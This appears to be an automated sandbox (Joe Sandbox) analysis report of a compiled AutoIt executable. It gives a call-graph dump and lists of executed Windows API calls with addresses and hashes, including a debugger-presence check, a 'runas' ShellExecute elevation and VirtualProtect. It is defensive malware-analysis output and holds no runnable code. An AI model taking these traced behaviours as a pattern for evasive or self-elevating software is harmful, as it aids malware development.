88045->86893 88046 42ae0e VariantClear 88046->88048 88048->88045 88048->88046 88489 40e270 VariantClear ctype 88048->88489 88049->86893 88050->86893 88051->86893 88052->86844 88053->86849 88054->86893 88055->86893 88056->86893 88057->86893 88058->86901 88059->86901 88060->86901 88061->86901 88062->86901 88063->86901 88064->86901 88066 403cdf 88065->88066 88067 408f40 VariantClear 88066->88067 88068 403ce7 88067->88068 88068->86888 88069->86901 88070->86901 88071->86893 88072->86841 88074 408e88 88073->88074 88076 408e94 88073->88076 88075 408f40 VariantClear 88074->88075 88075->88076 88076->87802 88076->88076 88077->87805 88078->87809 88079->87811 88080->87813 88081->87797 88082->87842 88083->87825 88084->87822 88085->87843 88086->87844 88087->87842 88089 40a7a6 88088->88089 88090 40ae8c 88088->88090 88092 4115d7 52 API calls 88089->88092 88131 41130a 51 API calls __cinit 88090->88131 88126 40a7c6 ctype _memmove 88092->88126 88093 40a86d 88094 40abd1 88093->88094 88113 40a878 ctype 88093->88113 88136 45e737 90 API calls 3 library calls 88094->88136 88095 408e80 VariantClear 88095->88126 88096 40bc10 53 API calls 88096->88126 88097 401b10 52 API calls 88097->88126 88099 42b791 VariantClear 88099->88126 88100 40b5f0 89 API calls 88100->88126 88101 42ba2d VariantClear 88101->88126 88102 408f40 VariantClear 88102->88113 88103 42b459 VariantClear 88103->88126 88104 40a884 ctype 88104->87843 88106 408cc0 185 API calls 88106->88126 88107 42b6f6 VariantClear 88107->88126 88108 42bc5b 88108->87843 88109 4530c9 VariantClear 88109->88126 88110 42bbf5 88137 45e737 90 API calls 3 library calls 88110->88137 88111 4115d7 52 API calls 88111->88126 88112 42bb6a 88139 44b92d VariantClear 88112->88139 88113->88102 88113->88104 88114 40e270 VariantClear 88114->88126 88115 4115d7 52 API calls 88117 42b5b3 VariantInit VariantCopy 88115->88117 88120 42b5d7 VariantClear 88117->88120 88117->88126 88119 408f40 VariantClear 88119->88126 88120->88126 88123 42bc37 88138 45e737 90 API calls 3 library calls 88123->88138 88126->88093 88126->88094 88126->88095 88126->88096 88126->88097 88126->88099 88126->88100 88126->88101 88126->88103 88126->88106 88126->88107 88126->88109 88126->88110 88126->88111 88126->88112 88126->88114 88126->88115 88126->88119 88126->88123 88132 45308a 53 API calls 88126->88132 88133 470870 52 API calls 88126->88133 88134 457f66 87 API calls __write_nolock 88126->88134 88135 472f47 127 API calls 88126->88135 88127 42bc48 88127->88112 88128 408f40 VariantClear 88127->88128 88128->88112 88129->87830 88130->87832 88131->88126 88132->88126 88133->88126 88134->88126 88135->88126 88136->88112 88137->88112 88138->88127 88139->88108 88140->87851 88141->87855 88142->87871 88143->87872 88144->87858 88145->87874 88146->87905 88147->87874 88148->87907 88149->87874 88150->87907 88151->87891 88152->87907 88153->87892 88154->87907 88155->87907 88156->87886 88158 4289d2 88157->88158 88159 408db3 88157->88159 88189 45e737 90 API calls 3 library calls 88158->88189 88187 40bec0 90 API calls 88159->88187 88162 4289e5 88190 45e737 90 API calls 3 library calls 88162->88190 88163 408e5a 88163->87913 88166 428a05 88167 408f40 VariantClear 88166->88167 88167->88163 88168 40a780 192 API calls 88169 408dc9 88168->88169 88169->88162 88169->88163 88169->88166 88169->88168 88170 408e64 88169->88170 88172 408f40 VariantClear 88169->88172 88188 40ba10 52 API calls 2 library calls 88169->88188 88171 408f40 VariantClear 88170->88171 88171->88163 88172->88169 88174 408f40 VariantClear 88173->88174 88175 403d20 88174->88175 88176 403cd0 VariantClear 88175->88176 88177 403d4d 88176->88177 88180 4013c0 52 API calls 88177->88180 88191 46e91c 88177->88191 88194 45e17d 88177->88194 88204 4755ad 88177->88204 88207 40de10 88177->88207 88212 467897 88177->88212 88178 403d76 88178->87910 88178->87919 88180->88178 88185->87910 88186->87912 88187->88169 88188->88169 88189->88162 88190->88166 88256 46e785 88191->88256 88193 46e92f 88193->88178 88195 45e198 88194->88195 88196 45e19c 88195->88196 88197 45e1b8 88195->88197 88198 408f40 VariantClear 88196->88198 88199 45e1cc 88197->88199 88200 45e1db FindClose 88197->88200 88201 45e1a4 88198->88201 88202 45e1d9 ctype 88199->88202 88203 44ae3e CloseHandle 88199->88203 88200->88202 88201->88178 88202->88178 88203->88202 88358 475077 88204->88358 88206 4755c0 88206->88178 88208 4115d7 52 API calls 88207->88208 88209 40de23 88208->88209 88210 40da20 CloseHandle 88209->88210 88211 40de2e 88210->88211 88211->88178 88213 4678bb 88212->88213 88252 467954 88213->88252 88457 45340c 85 API calls 88213->88457 88214 4115d7 52 API calls 88215 467989 88214->88215 88217 467995 88215->88217 88461 40da60 53 API calls 88215->88461 88221 4533eb 85 API calls 88217->88221 88218 4678f6 88220 413a0e __wsplitpath 46 API calls 88218->88220 88222 4678fc 88220->88222 88223 4679b7 88221->88223 88224 401b10 52 API calls 88222->88224 88225 40de40 60 API calls 88223->88225 88226 46790c 88224->88226 88227 4679c3 88225->88227 88458 40d200 52 API calls 2 library calls 88226->88458 88229 4679c7 GetLastError 88227->88229 88235 467a05 88227->88235 88231 403cd0 VariantClear 88229->88231 88230 467917 88230->88252 88459 4339fa GetFileAttributesW FindFirstFileW FindClose 88230->88459 88239 4679dc 88231->88239 88232 467a2c 88236 4115d7 52 API calls 88232->88236 88233 467a4b 88237 4115d7 52 API calls 88233->88237 88235->88232 88235->88233 88243 467a31 88236->88243 88244 467a49 88237->88244 88238 4679e6 88241 408f40 VariantClear 88238->88241 88239->88238 88245 44ae3e CloseHandle 88239->88245 88240 467928 88246 46792f 88240->88246 88240->88252 88248 4679ed 88241->88248 88242 467964 88242->88178 88462 436299 52 API calls 2 library calls 88243->88462 88250 408f40 VariantClear 88244->88250 88245->88238 88460 4335cd 56 API calls 3 library calls 88246->88460 88248->88178 88253 467a88 88250->88253 88251 467939 88251->88252 88254 408f40 VariantClear 88251->88254 88252->88214 88252->88242 88253->88178 88255 467947 88254->88255 88255->88252 88257 46e7a2 88256->88257 88258 4115d7 52 API calls 88257->88258 88261 46e802 88257->88261 88259 46e7ad 88258->88259 88260 46e7b9 88259->88260 88304 40da60 53 API calls 88259->88304 88305 4533eb 88260->88305 88262 46e7e5 88261->88262 88269 46e82f 88261->88269 88263 408f40 VariantClear 88262->88263 88265 46e7ea 88263->88265 88265->88193 88268 46e8b5 88297 4680ed 88268->88297 88269->88268 88272 46e845 88269->88272 88274 4533eb 85 API calls 88272->88274 88284 46e84b 88274->88284 88275 46e7db 88275->88262 88321 44ae3e 88275->88321 88276 46e87a 88324 4689f4 59 API calls 88276->88324 88278 46e8bb 88301 443fbe 88278->88301 88279 46e883 88282 4013c0 52 API calls 88279->88282 88285 46e88f 88282->88285 88284->88276 88284->88279 88286 40e0a0 52 API calls 88285->88286 88288 46e899 88286->88288 88287 408f40 VariantClear 88295 46e881 88287->88295 88325 40d200 52 API calls 2 library calls 88288->88325 88289 46e911 88289->88193 88291 46e8a5 88326 4689f4 59 API calls 88291->88326 88294 46e903 88296 44ae3e CloseHandle 88294->88296 88295->88289 88327 40da20 88295->88327 88296->88289 88298 468100 88297->88298 88299 4680fa 88297->88299 88298->88278 88331 467ac4 55 API calls 2 library calls 88299->88331 88332 443e36 88301->88332 88303 443fd3 88303->88287 88303->88295 88304->88260 88306 453404 88305->88306 88307 4533f8 88305->88307 88309 40de40 88306->88309 88307->88306 88339 4531b1 85 API calls 5 library calls 88307->88339 88310 40da20 CloseHandle 88309->88310 88311 40de4e 88310->88311 88340 40f110 88311->88340 88314 4264fa 88316 40de84 88349 40e080 SetFilePointerEx SetFilePointerEx 88316->88349 88318 40de8b 88350 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88318->88350 88320 40de90 88320->88269 88320->88275 88322 44ae4b ctype 88321->88322 88352 443fdf 88321->88352 88322->88262 88324->88295 88325->88291 88326->88295 88328 40da37 88327->88328 88329 40da29 88327->88329 88328->88329 88330 40da3c CloseHandle 88328->88330 88329->88294 88330->88294 88331->88298 88335 443e19 88332->88335 88336 443e26 88335->88336 88337 443e32 WriteFile 88335->88337 88338 443db4 SetFilePointerEx SetFilePointerEx 88336->88338 88337->88303 88338->88337 88339->88306 88341 40f125 CreateFileW 88340->88341 88342 42630c 88340->88342 88344 40de74 88341->88344 88343 426311 CreateFileW 88342->88343 88342->88344 88343->88344 88345 426337 88343->88345 88344->88314 88348 40dea0 55 API calls ctype 88344->88348 88351 40df90 SetFilePointerEx SetFilePointerEx 88345->88351 88347 426342 88347->88344 88348->88316 88349->88318 88350->88320 88351->88347 88353 40da20 CloseHandle 88352->88353 88354 443feb 88353->88354 88357 4340db CloseHandle ctype 88354->88357 88356 444001 88356->88322 88357->88356 88359 4533eb 85 API calls 88358->88359 88360 4750b8 88359->88360 88361 4750ee 88360->88361 88362 475129 88360->88362 88364 408f40 VariantClear 88361->88364 88409 4646e0 88362->88409 88369 4750f5 88364->88369 88365 47515e 88366 475162 88365->88366 88403 47518e 88365->88403 88367 408f40 VariantClear 88366->88367 88398 475169 88367->88398 88368 475357 88370 475365 88368->88370 88371 4754ea 88368->88371 88369->88206 88443 44b3ac 57 API calls 88370->88443 88449 464812 91 API calls 88371->88449 88375 4754fc 88376 475374 88375->88376 88378 475508 88375->88378 88422 430d31 88376->88422 88377 4533eb 85 API calls 88377->88403 88379 408f40 VariantClear 88378->88379 88382 47550f 88379->88382 88382->88398 88383 475388 88429 4577e9 88383->88429 88385 47539e 88437 410cfc 88385->88437 88386 475480 88388 408f40 VariantClear 88386->88388 88388->88398 88390 4753d4 88445 40e830 53 API calls 88390->88445 88391 4753b8 88444 45e737 90 API calls 3 library calls 88391->88444 88394 4753c5 GetCurrentProcess TerminateProcess 88394->88390 88395 4753e3 88407 475406 88395->88407 88446 40cf00 53 API calls 88395->88446 88396 4754b5 88397 408f40 VariantClear 88396->88397 88397->88398 88398->88206 88403->88368 88403->88377 88403->88386 88403->88396 88403->88403 88441 436299 52 API calls 2 library calls 88403->88441 88442 463ad5 64 API calls __wcsicoll 88403->88442 88405 408e80 VariantClear 88405->88407 88407->88398 88407->88405 88452 4536f7 53 API calls 88409->88452 88411 4646fc 88453 4426cd 59 API calls _wcslen 88411->88453 88413 464711 88415 40bc70 52 API calls 88413->88415 88421 46474b 88413->88421 88416 46472c 88415->88416 88454 461465 52 API calls _memmove 88416->88454 88418 464741 88419 40c600 52 API calls 88418->88419 88419->88421 88420 464793 88420->88365 88421->88420 88455 463ad5 64 API calls __wcsicoll 88421->88455 88423 430db2 88422->88423 88424 430d54 88422->88424 88423->88383 88425 4115d7 52 API calls 88424->88425 88426 430d74 88425->88426 88427 430da9 88426->88427 88428 4115d7 52 API calls 88426->88428 88427->88383 88428->88426 88430 457a84 88429->88430 88433 45780c _strcat _wcslen _wcscpy ctype 88429->88433 88430->88385 88431 443006 57 API calls 88431->88433 88433->88430 88433->88431 88434 4135bb 46 API calls _malloc 88433->88434 88435 45340c 85 API calls 88433->88435 88436 40f6f0 54 API calls 88433->88436 88456 44b3ac 57 API calls 88433->88456 88434->88433 88435->88433 88436->88433 88438 410d11 88437->88438 88439 410da9 VirtualProtect 88438->88439 88440 410d77 88438->88440 88439->88440 88440->88390 88440->88391 88441->88403 88442->88403 88443->88376 88444->88394 88445->88395 88449->88375 88452->88411 88453->88413 88454->88418 88455->88420 88456->88433 88457->88218 88458->88230 88459->88240 88460->88251 88461->88217 88462->88244 88463->88016 88464->87935 88465->87942 88466->88045 88467->87942 88468->87942 88469->87962 88470->87980 88471->87948 88472->87951 88473->87960 88474->88009 88475->88009 88476->88009 88477->87973 88478->87991 88479->87974 88480->88003 88481->88021 88482->88021 88483->88016 88484->88029 88485->88042 88486->88036 88487->88040 88488->88048 88489->88048 88490->87991 88491->87940 88492 42d154 88496 480a8d 88492->88496 88494 42d161 88495 480a8d 192 API calls 88494->88495 88495->88494 88497 480ae4 88496->88497 88498 480b26 88496->88498 88499 480aeb 88497->88499 88500 480b15 88497->88500 88501 40bc70 52 API calls 88498->88501 88502 480aee 88499->88502 88503 480b04 88499->88503 88529 4805bf 192 API calls 88500->88529 88509 480b2e 88501->88509 88502->88498 88505 480af3 88502->88505 88528 47fea2 192 API calls __itow_s 88503->88528 88527 47f135 192 API calls 88505->88527 88507 40e0a0 52 API calls 88507->88509 88509->88507 88512 480aff 88509->88512 88516 40e710 53 API calls 88509->88516 88517 401980 53 API calls 88509->88517 88519 40c2c0 52 API calls 88509->88519 88520 480ff5 88509->88520 88521 408e80 VariantClear 88509->88521 88522 40a780 192 API calls 88509->88522 88530 45377f 52 API calls 88509->88530 88531 45e951 53 API calls 88509->88531 88532 40e830 53 API calls 88509->88532 88533 47925f 53 API calls 88509->88533 88534 47fcff 192 API calls 88509->88534 88511 408f40 VariantClear 88513 481156 88511->88513 88512->88511 88514 408f40 VariantClear 88513->88514 88515 48115e 88514->88515 88515->88494 88516->88509 88517->88509 88519->88509 88535 45e737 90 API calls 3 library calls 88520->88535 88521->88509 88522->88509 88527->88512 88528->88512 88529->88512 88530->88509 88531->88509 88532->88509 88533->88509 88534->88509 88535->88512 88536 42b14b 88543 40bc10 88536->88543 88538 42b159 88539 4096a0 329 API calls 88538->88539 88540 42b177 88539->88540 88554 44b92d VariantClear 88540->88554 88542 42bc5b 88544 40bc24 88543->88544 88545 40bc17 88543->88545 88546 40bc2a 88544->88546 88547 40bc3c 88544->88547 88548 408e80 VariantClear 88545->88548 88549 408e80 VariantClear 88546->88549 88550 4115d7 52 API calls 88547->88550 88551 40bc1f 88548->88551 88552 40bc33 88549->88552 88553 40bc43 88550->88553 88551->88538 88552->88538 88553->88538 88554->88542 88555 425b2b 88560 40f000 88555->88560 88559 425b3a 88561 4115d7 52 API calls 88560->88561 88562 40f007 88561->88562 88563 4276ea 88562->88563 88569 40f030 88562->88569 88568 41130a 51 API calls __cinit 88568->88559 88570 40f039 88569->88570 88571 40f01a 88569->88571 88599 41130a 51 API calls __cinit 88570->88599 88573 40e500 88571->88573 88574 40bc70 52 API calls 88573->88574 88575 40e515 GetVersionExW 88574->88575 88576 402160 52 API calls 88575->88576 88577 40e557 88576->88577 88600 40e660 88577->88600 88583 427674 88586 4276c6 GetSystemInfo 88583->88586 88585 40e5cd GetCurrentProcess 88621 40ef20 LoadLibraryA GetProcAddress 88585->88621 88587 4276d5 GetSystemInfo 88586->88587 88591 40e629 88618 40ef90 88591->88618 88592 40e5e0 88592->88587 88614 40efd0 88592->88614 88595 40e641 FreeLibrary 88596 40e644 88595->88596 88597 40e653 FreeLibrary 88596->88597 88598 40e656 88596->88598 88597->88598 88598->88568 88599->88571 88601 40e667 88600->88601 88602 42761d 88601->88602 88603 40c600 52 API calls 88601->88603 88604 40e55c 88603->88604 88605 40e680 88604->88605 88606 40e687 88605->88606 88607 427616 88606->88607 88608 40c600 52 API calls 88606->88608 88609 40e566 88608->88609 88609->88583 88610 40ef60 88609->88610 88611 40e5c8 88610->88611 88612 40ef66 LoadLibraryA 88610->88612 88611->88585 88611->88592 88612->88611 88613 40ef77 GetProcAddress 88612->88613 88613->88611 88615 40e620 88614->88615 88616 40efd6 LoadLibraryA 88614->88616 88615->88586 88615->88591 88616->88615 88617 40efe7 GetProcAddress 88616->88617 88617->88615 88622 40efb0 LoadLibraryA GetProcAddress 88618->88622 88620 40e632 GetNativeSystemInfo 88620->88595 88620->88596 88621->88592 88622->88620 88623 425b5e 88628 40c7f0 88623->88628 88627 425b6d 88663 40db10 52 API calls 88628->88663 88630 40c82a 88664 410ab0 6 API calls 88630->88664 88632 40c86d 88633 40bc70 52 API calls 88632->88633 88634 40c877 88633->88634 88635 40bc70 52 API calls 88634->88635 88636 40c881 88635->88636 88637 40bc70 52 API calls 88636->88637 88638 40c88b 88637->88638 88639 40bc70 52 API calls 88638->88639 88640 40c8d1 88639->88640 88641 40bc70 52 API calls 88640->88641 88642 40c991 88641->88642 88665 40d2c0 52 API calls 88642->88665 88644 40c99b 88666 40d0d0 53 API calls 88644->88666 88646 40c9c1 88647 40bc70 52 API calls 88646->88647 88648 40c9cb 88647->88648 88667 40e310 53 API calls 88648->88667 88650 40ca28 88651 408f40 VariantClear 88650->88651 88652 40ca30 88651->88652 88653 408f40 VariantClear 88652->88653 88654 40ca38 GetStdHandle 88653->88654 88655 429630 88654->88655 88656 40ca87 88654->88656 88655->88656 88657 429639 88655->88657 88662 41130a 51 API calls __cinit 88656->88662 88668 4432c0 57 API calls 88657->88668 88659 429641 88669 44b6ab CreateThread 88659->88669 88661 42964f CloseHandle 88661->88656 88662->88627 88663->88630 88664->88632 88665->88644 88666->88646 88667->88650 88668->88659 88669->88661 88670 44b5cb 58 API calls 88669->88670 88671 454e3c8 88685 454c018 88671->88685 88673 454e4c2 88688 454e2b8 88673->88688 88691 454f4e8 GetPEB 88685->88691 88687 454c6a3 88687->88673 88689 454e2c1 Sleep 88688->88689 88690 454e2cf 88689->88690 88692 454f512 88691->88692 88692->88687 88693 425b6f 88698 40dc90 88693->88698 88697 425b7e 88699 40bc70 52 API calls 88698->88699 88700 40dd03 88699->88700 88707 40f210 88700->88707 88702 426a97 88704 40dd96 88704->88702 88705 40ddb7 88704->88705 88710 40dc00 52 API calls 2 library calls 88704->88710 88706 41130a 51 API calls __cinit 88705->88706 88706->88697 88711 40f250 RegOpenKeyExW 88707->88711 88709 40f230 88709->88704 88710->88704 88712 425e17 88711->88712 88713 40f275 RegQueryValueExW 88711->88713 88712->88709 88714 40f2c3 RegCloseKey 88713->88714 88715 40f298 88713->88715 88714->88709 88716 40f2a9 RegCloseKey 88715->88716 88717 425e1d 88715->88717 88716->88709

                                                                                                        Executed Functions

                                                                                                        Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2383988440-0
                                                                                                        • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                        • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                        Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                        • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                        Strings
                                                                                                        • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                        • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                        • API String ID: 2495805114-3383388033
                                                                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                        Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1929 427698-4276a8 1920->1929 1921->1919 1925 427636-427640 1922->1925 1926 42762b-427631 1922->1926 1927 40e5a5-40e5ae 1923->1927 1928 427654-427657 1923->1928 1925->1918 1926->1918 1932 40e5b4 1927->1932 1933 427645-42764f 1927->1933 1928->1918 1931 42765d-42766f 1928->1931 1934 4276b0 1929->1934 1935 4276aa-4276ae 1929->1935 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                        • String ID: 0SH$ou
                                                                                                        • API String ID: 3363477735-1412203762
                                                                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                        Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
